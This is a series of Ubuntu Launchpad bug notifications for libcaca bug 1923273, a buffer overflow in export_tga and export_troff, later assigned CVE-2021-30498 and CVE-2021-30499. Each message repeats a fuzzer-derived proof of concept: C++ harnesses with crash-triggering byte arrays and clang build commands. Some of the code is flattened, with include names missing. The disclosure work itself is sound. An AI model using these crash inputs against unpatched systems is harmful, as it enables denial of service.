[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Changed in: libcaca (Ubuntu) Status: Confirmed => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: Fix Released Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++
[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Changed in: libcaca (Ubuntu) Status: New => Confirmed -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: Confirmed Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_tga.cc
[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
Issues have been assigned numbers CVE-2021-30498、CVE-2021-30499 ** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30498 ** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30499 -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char);
[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Summary changed: - libcaca buffer-overflow + buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char));